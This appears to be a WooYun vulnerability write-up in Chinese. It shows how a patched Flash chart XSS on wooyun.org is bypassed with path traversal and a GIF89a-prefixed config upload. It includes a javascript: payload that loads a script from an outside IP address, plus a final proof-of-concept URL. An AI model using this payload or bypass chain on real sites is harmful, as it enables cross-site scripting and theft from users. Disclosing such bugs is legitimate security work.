WooYun.org

1、话说之前的在这里 http://zone.wooyun.org/content/5548，http://drops.wooyun.org/papers/382 到现在还有人问我要 wb 呢。
2、之前的很快就修了，反正对当时肯定是没办法用了。可修复的到底是否彻底呢？来跟随胖子的脚步一起走进今天的《胖子玩蛋去》。
3、直接访问之前的 flash 文件：http://www.wooyun.org/ofc/open-flash-chart.swf，页面返回“you know.”，能够显示正常的 URL 为：http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php?module=corptypecount%26type=%26id=2，我们大致可以判断是在 web server 层面做的访问控制。同时验证 flash 文件本身没有做任何修复处理。
4、那就是说如果能够绕过 web server 的访问控制就又可以偷 wb 了，怎么绕过呢，这部分详细过程略过，大概的判断是限制的 data 参数的值，只允许 /ajaxdo.php 开头，在这个地方我们来感谢一下 pz 姐，找到了绕过的方法：http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php/../
5、可是下面的问题是我们没有办法加载远程的配置文件了，www.wooyun.org 域下我们能够控制的就是“插入图片”，印象中乌云本身对图片会添加水印，这样就会对图片就行处理，中间尝试了下 http://zone.wooyun.org/content/5429 的方法由于我们的利用代码稍微多点导致一直失败，就此放弃？
6、我能说不么，我印象中乌云对 GIF 格式的图片是不做处理了，到底是不是呢，插一下就知道了嘛。事实就是不做任何处理的，只要能够绕过这里那不就可以了么。
7、下面还是之前的配置代码：

&title=腾讯高危漏洞一览表（点击类别可以查看详情）,{font-size:18px; color: #d01f3c}&
&x_axis_steps=1&
&y_ticks=50,50&
&line=2,#87421F&
&y_min=0&
&y_max=20&
&pie=60,#E4F0DB,{display:none;},1,,1&
&values=50,50&
&pie_labels=远程命令执行,腾讯客户端溢出&
&colours=#d01f3c,#356aa0&
&links=javascript:window.s=document.createElement('script');window.s.src='http://42.96.150.181/data.js';document.body.appendChild(window.s);,javascript:window.s=document.createElement('script');window.s.src='http://42.96.150.181/data.js';document.body.appendChild(window.s);&
&tool_tip=类别%3A+%23x_label%23%3Cbr%3E比例%3A+%23val%23%25&

直接写入文件改个后缀就上传那当然是不行的，可是在文件头加个 “GIF89a” 呢，事实证明是可以的。
7、http://www.wooyun.org/upload/201308/26143517bb1ac5aec31698c69707e362404f314a.gif 这个就是我们上传的图片地址，直接访问不行因为有 referer 限制，不过对于我们去利用是没关系的，本身 flash 加载就带上 referer 的。
8、最后的 POC 就是：http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php/../upload/201308/26143517bb1ac5aec31698c69707e362404f314a.gif
多么熟悉的界面。